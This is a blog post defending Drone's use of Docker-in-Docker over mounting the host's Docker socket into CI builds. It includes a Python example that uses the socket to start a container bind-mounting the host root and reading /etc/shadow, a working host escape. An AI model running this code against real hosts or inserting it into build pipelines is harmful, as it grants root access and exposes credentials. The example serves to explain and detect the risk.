I am writing this article because Drone has a plugin for building and publishing Docker images that uses Docker-in-Docker (dind). I am occasionally asked why I would take such an approach, followed by a link to a blog post by jpetazzo which advises against dind.
In his blog post, Jerome suggests the ideal solution is the following:
Simply put, when you start your CI container (Jenkins or other), instead of hacking something together with Docker-in-Docker, start it with:
docker run -v /var/run/docker.sock:/var/run/docker.sock
The biggest problem with this approach is security. If you mount the Docker socket into your build container, you are granting that build container root access to your host machine: the Docker daemon runs as root, and anything that can write to its socket can ask the daemon to do anything the daemon can do. I can think of a number of trivial ways the Docker socket can be used to compromise your system, such as starting a container that bind-mounts the host machine's filesystem, which gives the build read and write access to your entire system. Game over.
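To make the "game over" concrete, here is an added example (my own illustration, not Drone's code and not from Jerome's post) of what a build step can do once the socket is mounted. It speaks to the Docker Engine API directly over the Unix socket, so it does not even need the docker CLI inside the build container, and it includes the check a build can run to tell whether the socket has been handed to it. The socket path, the image name "alpine", and the assumption that the image is already present on the host are all assumptions of the example.

```python
"""Added example: the Docker socket is root on the host.

Not Drone's code. Assumes the Docker Engine API endpoints
/containers/create and /containers/{id}/start, the default socket path,
and that the image "alpine" is already pulled on the host (docker run
would pull it for you; the raw API returns 404 if it is missing).
"""
import http.client
import json
import os
import socket
import stat

DOCKER_SOCKET = "/var/run/docker.sock"  # assumed default path


class UnixHTTPConnection(http.client.HTTPConnection):
    """HTTPConnection that talks over a Unix domain socket instead of TCP."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def socket_exposed(path=DOCKER_SOCKET):
    """True if a Docker socket exists at `path` and this process can write to it.

    Write access to the socket is equivalent to root on the host, because the
    daemon runs as root and will bind-mount any host path on request.
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return stat.S_ISSOCK(st.st_mode) and os.access(path, os.W_OK)


def host_escape_request(image="alpine", cmd=("cat", "/host/etc/shadow")):
    """Build the create-container body equivalent to `docker run -v /:/host ...`.

    The daemon bind-mounts the host root at /host inside the new container,
    so the command runs with full access to the host filesystem.
    """
    return {
        "Image": image,
        "Cmd": list(cmd),
        "HostConfig": {"Binds": ["/:/host"]},
    }


def create_and_start(path=DOCKER_SOCKET, body=None):
    """POST the request to the daemon and start the container. Returns its id."""
    body = body or host_escape_request()

    conn = UnixHTTPConnection(path)
    conn.request(
        "POST",
        "/containers/create",
        body=json.dumps(body),
        headers={"Content-Type": "application/json"},
    )
    resp = conn.getresponse()
    created = json.loads(resp.read())
    conn.close()
    if resp.status != 201:
        raise RuntimeError(f"create failed ({resp.status}): {created}")

    conn = UnixHTTPConnection(path)
    conn.request("POST", f"/containers/{created['Id']}/start")
    resp = conn.getresponse()
    resp.read()
    conn.close()
    if resp.status not in (204, 304):
        raise RuntimeError(f"start failed ({resp.status})")
    return created["Id"]


if __name__ == "__main__":
    # A build step can run this check before doing anything else.
    if socket_exposed():
        print("writable docker socket found: this build is root on the host")
        print(json.dumps(host_escape_request(), indent=2))
    else:
        print("no writable docker socket: the build cannot reach the host daemon")
```

Nothing in the request is privileged from the daemon's point of view; it is an ordinary container create with an ordinary bind mount. That is the whole problem: the daemon cannot distinguish a legitimate build from a hostile one, so the only control is whether the socket is reachable at all.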
This is especially a concern for build servers, which hold sensitive information such as passwords and deploy credentials in order to perform auto-deployment tasks. Gaining access to the host machine could allow this information to be intercepted, and your production systems compromised.
Now this is probably not an issue if you are running Jenkins for a small team of trusted developers. This solution is not acceptable, however, if you are running builds for an open source project that accepts pull requests, or if your organization is highly regulated and has strict access-control policies. But won't code review solve this? No: the build of a pull request runs before anyone has reviewed it, so a malicious developer could open a trivial pull request whose build step uses the Docker socket to compromise your host machine.
This is the primary reason we have chosen not to mount the host machine's Docker socket into the build environment by default. The baseline version of Drone needs to provide a minimum level of security for multiple use cases, not just small teams in trusted environments. That being said, Drone will happily get out of your way and mount the host machine's Docker socket into your build container if your project is white-listed.
In conclusion, I think it is important to remember that different systems have different requirements and constraints, and this is reflected in our design decisions. I doubt Jerome wrote his blog post as a sweeping statement that should be taken as canon in the Docker world. He was simply proposing that most people may be unnecessarily using dind without understanding the alternatives. In this case, I have carefully considered the alternatives and believe this was the best decision for Drone.